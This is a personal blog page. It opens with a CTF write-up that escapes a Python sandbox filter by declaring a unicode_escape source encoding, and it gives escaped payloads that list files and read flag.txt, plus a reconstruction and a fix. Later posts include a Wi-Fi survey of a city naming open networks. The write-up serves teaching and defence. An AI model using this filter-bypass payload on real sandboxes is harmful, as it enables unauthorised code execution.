Monday, December 30, 2013

30C3 CTF 2013 - Sandbox 300 PyExec writeup

Description
PyExec running on http://88.198.89.213:8080

We have the sources of a Python jail. We need to execute code and get the flag.
Before execution almost all Python keywords are filtered out and a regex check is applied: only lowercase letters, digits and a few other characters are allowed (parentheses, brackets, quotes and the dot are prohibited!).
It is known that the first line (or the second, if a shebang is used) of a Python script can be a comment declaring the source encoding (PEP 263). All supported encodings are listed here: http://docs.python.org/2.6/library/codecs.html
First I tried the rot13 encoding:
# coding: rot13
With it the keyword filter can be bypassed (rot13 only permutes letters, so e.g. "cevag" decodes to "print" after the blacklist has already run), but punctuation is left untouched, and without the dot, parentheses and quotes it is hard to call functions (it can be done with exec and by redefining string.punctuation etc.).
After trying other encodings I found unicode_escape:
# coding: unicode_escape
With it the jail is bypassed completely and code is executed: every character of the payload, including the forbidden ones, is written as a \xNN escape, so the filter sees only backslashes, lowercase letters and digits, while the interpreter decodes the escapes before tokenizing. The root cause is a canonicalization mismatch: the filter inspects the raw submitted bytes, but the interpreter applies the declared codec first, so the two see different programs.
Here is my code before encoding to unicode_escape.
List files:
import os;print os.listdir('.')
['.bash_logout', 'flag.txt', 'webapp.py', '.bashrc', '.profile', '.viminfo', '.cache', '.bash_history', 'static']
Excellent, flag.txt is found. Let's read it:
print open('flag.txt').read()
After encoding to unicode_escape (the escaped version wraps the file name in double quotes, \x22):
# coding: unicode_escape
\x70\x72\x69\x6e\x74\x20\x6f\x70\x65\x6e\x28\x22\x66\x6c\x61\x67\x2e\x74\x78\x74\x22\x29\x2e\x72\x65\x61\x64\x28\x29

We get a flag: 30C3_2a2766d9cf4a137d517a8227bd71d59d
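To make the mechanism concrete, here is an added example (my own reconstruction, not the challenge's code and not the writeup's) that reimplements a jail filter of the kind described, wraps a payload in the writeup's \xNN form, and executes the result the way the challenge did. It runs on Python 3, where print is no longer a keyword, so the stand-in payload relies on import, '.', '(' and quotes instead. The exact character whitelist (ALLOWED_RE) and the keyword blacklist are assumptions, since the jail's source is not on the page, and the stand-in payload calls os.path.basename rather than reading a flag file so that its result is deterministic.

```python
import codecs
import keyword
import re

# Reconstructed PyExec filter (assumption: the jail's real source is not on the page).
# Keywords are rejected outright, then every character must be on a whitelist.
# '(', ')', '[', ']', quotes and '.' are deliberately absent; '#', ':', '_', '\\',
# space and newline are present because the writeup's "# coding: unicode_escape"
# line and its \xNN payload evidently got through.
KEYWORD_RE = re.compile(r"\b(?:%s)\b" % "|".join(map(re.escape, keyword.kwlist)))
ALLOWED_RE = re.compile(r"^[a-z0-9 _#:;=+\-*/%<>!&|^~,\\\n]*$")

CODING_LINE = "# coding: unicode_escape\n"

# Stand-in for the real payload (which read flag.txt): it needs '.', '(' and '"'
# plus the keyword 'import', so the jail rejects it verbatim. os.path.basename
# gives a deterministic result without touching the filesystem.
ORIGINAL_SOURCE = 'import os\nresult = os.path.basename("/home/ctf/flag.txt")\n'


def jail_reject_reason(submission):
    """None if the reconstructed jail accepts the text, otherwise why it does not."""
    m = KEYWORD_RE.search(submission)
    if m:
        return "keyword %r" % m.group(0)
    for ch in submission:
        if not ALLOWED_RE.match(ch):
            return "character %r" % ch
    return None


def to_unicode_escape(source):
    """Rewrite every character as \\xNN, the form used in the writeup."""
    if any(ord(c) > 0xFF for c in source):
        raise ValueError("\\xNN escapes only cover code points below 0x100")
    return "".join("\\x%02x" % ord(c) for c in source)


def build_script(source):
    """Bytes to submit: coding cookie on line 1, escaped program on line 2."""
    return (CODING_LINE + to_unicode_escape(source)).encode("ascii")


def interpreter_view(script):
    """What the tokenizer sees once it honours the cookie (PEP 263): the
    escapes are decoded back into the original, forbidden characters."""
    return codecs.decode(script, "unicode_escape")


def run_in_jail(script):
    """Filter the raw bytes, then execute them as the challenge did. compile()
    on a bytes object applies the declared source encoding before parsing."""
    reason = jail_reject_reason(script.decode("ascii"))
    if reason is not None:
        raise ValueError("rejected: " + reason)
    namespace = {}
    exec(compile(script, "<jail>", "exec"), namespace)
    return namespace


if __name__ == "__main__":
    print("verbatim :", jail_reject_reason(ORIGINAL_SOURCE))          # keyword 'import'
    script = build_script(ORIGINAL_SOURCE)
    print("escaped  :", jail_reject_reason(script.decode("ascii")))   # None
    print(interpreter_view(script))
    print("result   =", run_in_jail(script)["result"])                # flag.txt
```

The filter and the interpreter disagree about what the program is: the filter reads the raw bytes, the tokenizer first applies the codec named in the cookie and only then tokenizes. Any filter that runs before decoding has this problem; the fix is to decode with the declared codec (or reject any coding declaration at all) before matching. Note that rot13 is accepted as a source encoding only by Python 2; on Python 3 it is not a text encoding and the tokenizer refuses it, while unicode_escape still works.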

Thursday, November 28, 2013

Hackers: Heroes of the Computer Revolution

I've just finished reading the excellent book "Hackers: Heroes of the Computer Revolution" by Steven Levy.


Highly recommended to everyone involved with computers, gamedev, electronics, hacking, etc.

After reading it I also recommend watching the movie Pirates of Silicon Valley. Some events and characters parallel events from the book.

The first part, about the first true hackers, was really new to me, maybe because the second part (about hardware hackers) is more commonly known and popular thanks to its reflection in cinema and documentary films.
The chapters about game development companies, game hackers and the birth of the first games are very exciting. I remember those interesting games by Sierra Online, like Mystery House, King's Quest, Space Quest and others, with beautiful graphics and addictive stories.

PS. I read a version with a new afterword, "Afterword: Ten Years After", with the latest information about some of the characters. Wikipedia says that an updated 25th anniversary edition was published in 2010.

Saturday, November 16, 2013

Hauppauge HD PVR and Linux

Last week I tried to get a Hauppauge HD PVR running under Linux (Ubuntu 12.04), after running it successfully under Windows 7.
After reading and trying the things from http://www.mythtv.org/wiki/Hauppauge_HD-PVR, I still found that the command reading the stream from the device failed with an error:
cat /dev/video1 > test.ts
cat: /dev/video1: Input/output error

Later I found that this error occurs if no video cable (carrying a signal, of course) is connected to the HD PVR; under Windows, by contrast, a blue screen is output when no cable is connected.

After connecting the component (YPbPr) video cable you need to configure the default video input of the HD PVR device. You can do it with the following commands (reload the module with the desired input as a parameter):
rmmod hdpvr
modprobe hdpvr hdpvr_debug=1 default_video_input=0

Default video input values for the HD PVR:
0=Component (YPbPr)
1=S-Video
2=Composite

Or with the v4l2-ctl tool (from the v4l-utils package), which switches the input at runtime without reloading the module:
sudo v4l2-ctl -d /dev/video1 --set-input=0

After that I successfully captured the video stream from the HD PVR.

Friday, November 8, 2013

C function argument name

Reading some source code I stumbled upon a funny function argument name. :)

Thursday, October 24, 2013

Friday, October 18, 2013

Text to Morse code wave converter

Just published a new tool in Python called morse wave on github. It converts text into Morse code and saves it as a WAV file.

Thursday, October 3, 2013

Arkanoid game in JavaScript and HTML5 Canvas

I've continued making projects in JavaScript and HTML5 Canvas. This time I've made the famous Arkanoid game.
The source code of the game is available in my github repository here.

Saturday, September 14, 2013

Programmers Day 2013

Happy Programmers' Day 2013!!!
Two IT professional days fell this week: Software Tester (QA) Day on September 9 and Programmers' Day on September 13 (Friday the 13th, by the way). We celebrated with a special delicious IT cake. Happy QA && Programmer days!

Saturday, August 31, 2013

Fractals

Yesterday I added a new repository (fractals-js) on github, dedicated to fractal visualization with JavaScript and HTML5 Canvas.
The first visualization added is the famous Mandelbrot set. Fractal images in different colours:
Visualizations of the Mandelbrot set

The second visualization added is the Julia set. Below are images for different complex parameters and colours:
Visualizations of the Julia set

The next visualization added is the Burning Ship fractal:
Visualizations of the Burning Ship fractal

The fourth visualization added is the Sierpinski carpet:
Visualizations of the Sierpinski carpet fractal

Tuesday, August 20, 2013

Saturday, August 17, 2013

YAGNI

In software development there is the principle "YAGNI" (You Ain't Gonna Need It). Funnily enough, the Kazakh language has a similar-sounding conjunction «яғни», which translates as "that is".

Friday, July 26, 2013

New TSU dorm

The new TSU dormitory looks like this on the map:
Star Trek had an influence :)

Monday, July 1, 2013

Analysis of Wi-Fi networks in Tomsk

Over several weeks I carried out a survey and collected statistics on the Wi-Fi networks in the city.
At the very start I estimated the maximum number of networks at 15 thousand. Now I think the maximum is higher (counting inner courtyards). For the collection I tried to walk the whole city, at least the main streets. In total I got 12842 unique networks (uniqueness determined by MAC address, i.e. BSSID).
Here are some statistics on the collected networks.
Top-5 Wi-Fi device vendors in the city:
Device (vendor)  Count
D-Link   1379
ASUS      628
TP-LINK   392
ZyXEL     264
NETGEAR   203

Security (encryption) flags in use, as reported by the scanner:
Security flags  Count
[WPA2-PSK-CCMP]  2115
[WPA-PSK-TKIP+CCMP][WPA2-PSK-TKIP+CCMP][WPS][WPS]  1889
[WPA2-PSK-CCMP][WPS][WPS]  1503
[WPA-PSK-TKIP+CCMP][WPA2-PSK-TKIP+CCMP]  1304
[Not Encrypted]  848
[WPA-PSK-TKIP]  551
[WPA-PSK-TKIP+CCMP][WPS][WPS]  469
[WPA2-PSK-TKIP+CCMP][WPS][WPS]  424
[WPA-PSK-CCMP][WPA2-PSK-CCMP][WPS][WPS]  369
[WPA-PSK-CCMP][WPA2-PSK-CCMP]  298
[WPA-PSK-CCMP]  292
[WPA2-PSK-TKIP]  290
[WPA2-PSK-TKIP+CCMP]  235
[WPS][WPS]  214
[WPA-EAP-TKIP][WPA2-EAP-CCMP]  212
[WPA-PSK-TKIP][WPA2-PSK-TKIP]  206
[WEP]  204
[WPA-PSK-TKIP][WPS][WPS]  187
[WPS][WPS][WEP]  169
[WPA-PSK-TKIP][WPA2-PSK-TKIP][WPS][WPS]  140
[WPA2-PSK-TKIP][WPS][WPS]  108
[WPA-PSK-TKIP+CCMP][WPA2-PSK-CCMP]  107
[WEP][IBSS]  106
[WPA-PSK-TKIP+CCMP]  100
[IBSS]  88
[WPA-PSK-TKIP+CCMP][WPA2-PSK-TKIP+CCMP-preauth]  82
[WPA-PSK-CCMP][WPS][WPS]  66
[WPA2-PSK-TKIP+CCMP-preauth]  49
[WPA-PSK-TKIP][WPA2-PSK-CCMP]  39
[WPA2-PSK-CCMP][IBSS]  37
[WPA-EAP-TKIP+CCMP][WPA2-EAP-TKIP+CCMP]  32
[WPA2-PSK-CCMP-preauth]  26
[WPA-PSK-TKIP][WPA2-PSK-CCMP][WPS][WPS]  16
[WPA2-PSK-TKIP-preauth]  15
[WPA2-EAP-CCMP]  7
[WPA-PSK-CCMP][WPA2-PSK-CCMP-preauth]  6
[WPA-PSK-TKIP][WPA2-PSK-TKIP-preauth]  5
[WPA-PSK-TKIP][WPA2-PSK-TKIP+CCMP]  4
[WPA2-EAP-CCMP-preauth]  4
[WPA-PSK-TKIP+CCMP][WPA2-PSK-TKIP+CCMP-preauth][WPS][WPS]  3
[WPA-EAP-TKIP]  3
[WPA-PSK-TKIP][WPA2-PSK-CCMP-preauth]  2
[WPA2-PSK-CCMP][WPS-PIN][WPS-PIN]  2
[WPS-PIN][WPS-PIN]  2
[WPA-?][WPA2-PSK-CCMP][WPS-PIN][WPS-PIN]  2
[WPA2-PSK-CCMP-preauth][WPS][WPS]  1
[WPA-EAP-CCMP][WPA2-EAP-CCMP]  1
[WPA2-PSK-TKIP+CCMP-preauth][WPS][WPS]  1
[WPA-PSK-TKIP][WPA2-PSK-TKIP+CCMP][WPS][WPS]  1
[WPA-PSK-CCMP][WPS-PIN][WPS-PIN]  1
[WPA2-PSK-TKIP-preauth][WPS][WPS]  1
[WPA2-?]  1
[WPA2--TKIP+CCMP]  1
[WPS-PBC][WPS-PBC]  1
[WPA-PSK-TKIP+CCMP][WPA2-PSK-CCMP-preauth]  1
[WPA-?][WPA2-PSK-CCMP][WPS][WPS]  1
[WPA-PSK-TKIP][WPS-PIN][WPS-PIN]  1

As for security: 848 networks reported no security flags at all, and the 214 [WPS][WPS], 88 [IBSS], 2 [WPS-PIN][WPS-PIN] and 1 [WPS-PBC][WPS-PBC] rows carry no WPA or WEP flag either, so about 1150 of the 12842 networks (roughly 9%) are effectively open. WEP appears in three rows, [WEP] 204, [WPS][WPS][WEP] 169 and [WEP][IBSS] 106, which makes 479 networks (3.7%) on a cipher that has been practically breakable for years, not just the 204 in the plain [WEP] row. Beyond that, about 6,500 networks (over half) still allow the TKIP cipher alongside CCMP, and a large share advertise WPS. All in all, not bad.
Number of Wi-Fi devices per frequency (channel):
Frequency, MHz (channel)  Count
2412 (1)   3548
2437 (6)   2378
2462 (11)  2250
2417 (2)    731
2452 (9)    565
2472 (13)   549
2427 (4)    523
2457 (10)   506
2432 (5)    473
2422 (3)    384
2442 (7)    369
2467 (12)   310
2447 (8)    256

As the table shows, the networks found use the 13 channels of the 2.4 GHz band, i.e. 802.11b/g/n; the non-overlapping channels 1, 6 and 11 carry nearly two thirds of them, and channel 8 is the least used. (A scanner that only listens on 2.4 GHz would not have seen 5 GHz networks at all, so nothing can be said here about 802.11a/n on 5 GHz.)
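The counts above can be reproduced, and the grading made stricter than open/WEP/everything else, with a short script. The following is an added example of my own, not the post's Android collector (which was never published): it parses bracketed flag strings in the format the tables use, deduplicates by BSSID as the post does, grades each network by the strongest suite it offers while separately flagging anything an attacker can still exploit (TKIP still negotiable, WPS enabled, WEP, ad-hoc, open), and maps frequencies to channel numbers, including the 5 GHz band that the tables do not contain. The scan rows are constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample scan (not the post's data): (bssid, ssid, capabilities, frequency_mhz).
# Capability strings use the same bracketed flag format as the tables above.
SAMPLE_SCAN = [
    ("00:11:22:33:44:01", "TPU Guest", "", 2412),               # no flags at all: open
    ("00:11:22:33:44:02", "DIR-300NRU", "[WPS][WPS]", 2437),    # WPS but no cipher: still open
    ("00:11:22:33:44:03", "home", "[WEP]", 2462),
    ("00:11:22:33:44:04", "kosmos", "[WEP][IBSS]", 2412),       # ad-hoc network on WEP
    ("00:11:22:33:44:05", "ASUS", "[WPA-PSK-TKIP]", 2437),      # WPA1 only, TKIP only
    ("00:11:22:33:44:06", "dlink", "[WPA-PSK-TKIP+CCMP][WPA2-PSK-TKIP+CCMP][WPS][WPS]", 2447),
    ("00:11:22:33:44:07", "tusur", "[WPA-EAP-TKIP][WPA2-EAP-CCMP]", 2472),
    ("00:11:22:33:44:08", "Elena", "[WPA2-PSK-CCMP]", 2467),
    ("00:11:22:33:44:08", "Elena", "[WPA2-PSK-CCMP]", 2467),    # same BSSID seen twice
]

FLAG_RE = re.compile(r"\[([^\]]*)\]")


def parse_flags(capabilities):
    """'[WPA2-PSK-CCMP][WPS]' -> ['WPA2-PSK-CCMP', 'WPS']; '' -> []."""
    return FLAG_RE.findall(capabilities)


def ciphers_in(flag):
    """Pairwise ciphers named in one WPA flag: 'WPA2-PSK-TKIP+CCMP-preauth' -> {'TKIP', 'CCMP'}."""
    return {c for part in flag.split("-") for c in part.split("+") if c in ("TKIP", "CCMP")}


def classify(capabilities):
    """Return (security_class, weaknesses) for one capability string.

    security_class is the strongest suite the AP offers; weaknesses collects every
    flag that still gives an attacker something to work with even when a stronger
    option is advertised too (TKIP negotiable, WPS enabled, ad-hoc, WEP, open).
    """
    flags = parse_flags(capabilities)
    weaknesses = set()
    if any(f.startswith("WPS") for f in flags):
        weaknesses.add("wps")
    if "IBSS" in flags:
        weaknesses.add("adhoc")
    if "WEP" in flags:
        weaknesses.add("wep")
    wpa_flags = [f for f in flags if f.startswith("WPA")]
    if not wpa_flags:
        if "WEP" in flags:
            return "wep", weaknesses
        weaknesses.add("open")          # no WPA and no WEP: nothing protects the traffic
        return "open", weaknesses
    wpa2_ciphers = set().union(*(ciphers_in(f) for f in wpa_flags if f.startswith("WPA2")))
    all_ciphers = set().union(*(ciphers_in(f) for f in wpa_flags))
    if "TKIP" in all_ciphers:
        weaknesses.add("tkip-allowed")
    if "CCMP" in wpa2_ciphers:
        return "wpa2-ccmp", weaknesses
    if "CCMP" in all_ciphers:
        return "wpa-ccmp", weaknesses
    if "TKIP" in all_ciphers:
        return "wpa-tkip", weaknesses
    return "wpa-unknown", weaknesses    # e.g. a bare '[WPA-?]' row: cipher not reported


def channel_from_frequency(mhz):
    """Map a centre frequency to an 802.11 channel number (2.4 GHz and 5 GHz bands)."""
    if mhz == 2484:
        return 14
    if 2412 <= mhz <= 2472 and (mhz - 2412) % 5 == 0:
        return (mhz - 2412) // 5 + 1
    if 5000 < mhz < 6000 and mhz % 5 == 0:
        return (mhz - 5000) // 5
    raise ValueError("not an 802.11 channel centre frequency: %d MHz" % mhz)


def summarize(scan):
    """Deduplicate by BSSID (as the post does), then count classes, weaknesses and channels."""
    unique = {}
    for bssid, ssid, caps, mhz in scan:
        unique.setdefault(bssid.lower(), (ssid, caps, mhz))
    classes, weaknesses, channels = Counter(), Counter(), Counter()
    for ssid, caps, mhz in unique.values():
        cls, weak = classify(caps)
        classes[cls] += 1
        weaknesses.update(weak)
        channels[channel_from_frequency(mhz)] += 1
    return {"networks": len(unique), "classes": classes,
            "weaknesses": weaknesses, "channels": channels}


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_SCAN).items():
        print(key, dict(value) if isinstance(value, Counter) else value)
```

Feeding the table above through classify() row by row is how the corrected open/WEP/TKIP totals in the security paragraph were obtained; the point of keeping weaknesses separate from the class is that a "[WPA2-PSK-CCMP]" grade hides nothing, whereas the very common "[WPA-PSK-TKIP+CCMP][WPA2-PSK-TKIP+CCMP][WPS][WPS]" row grades as WPA2-CCMP yet still lets a client negotiate TKIP and exposes WPS.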

Top-50 open networks (by SSID):
SSID  Count
TPU Press  74
TPU Guest  69
DIR-300NRU  54
DOM.RU Wi-Fi  42
ASUS  36
TSUNet  34
tusur  31
DIR-300  30
DIR-620  21
DIR-300NRUB6  20
default  19
DIR-320NRU  17
DIR-615  15
DIR-300NRUB7  10
DIR-300NRU.2  10
wifi_1  9
dlink  7
Magistrat_Free_Wifi  7
CITYADM_LDAP  6
RFF-Sky  6
library  5
DIR-300NRUB5  5
MikroTik  5
rubifi  4
Bon  4
DAP-1360  4
AndroidAP  3
UPVEL UR-315BN  3
TSPU Guest  3
Forum  3
TSPU  3
M-Video_Free_WiFi  3
mag  3
BHR  3
kruger  2
dd-wrt  2
MegaFon  2
TSUNet_Library  2
kosmos  2
TOMLINE_FOR_SBERBANK  2
dns_open  2
guest  2
DOMRU Guest  2
DL VAP w1 g  2
NETGEAR  2
Beeline_router  2
stg-guest  2
DIR-300-Yan  1
tomdent888  1
FTF Wireless Network  1

Of all the networks found, only about 80 use non-Latin characters in the network name.
There was also plenty of creativity among the network names, although many people name their network after their first or last name or a company name; some even use their street address and flat number, or a social-network ID. A large share of the most common names below are factory defaults (DIR-300NRU, DSL-2640U, TRENDnet652 and so on), which advertise the router model to anyone nearby.
Top-50 most popular network names:
SSID  Count
ASUS  419
dlink  258
DIR-300NRU  252
NETGEAR  158
DIR-615  146
DIR-300  110
DIR-620  88
DIR-300NRUB6  83
TPU Press  74
TPU Public  72
TPU VIP  71
TPU Hostels  70
TPU Guest  69
default  66
Home  65
DIR-320NRU  62
Connectify-me  59
DSL-2640U  51
DIR-300NRUB7  48
ELTEX_NTP-RG14xxG-W  48
beeline-router  47
DOM.RU Wi-Fi  42
ELTEX_NTERG14xxG-W  41
home  38
ZyXEL  38
TSUNet  34
YOTA  34
tusur  31
test-tusur  29
dd-wrt  27
TP-LINK  25
DIR-300NRUB5  20
Tenda  18
HomeNet  17
mag  17
tomtel  15
Guest  14
linksys  14
TRENDnet  14
TRENDnet652  14
AndroidAP  13
WiFi-DOM.ru-6111  13
asus  12
Beeline_router  11
Elena  11
HOME  11
TRENDnet651  11
wifi  11
Wi-Fi  11
DIR-300NRU.2  10

For the collection I used a self-written Android app.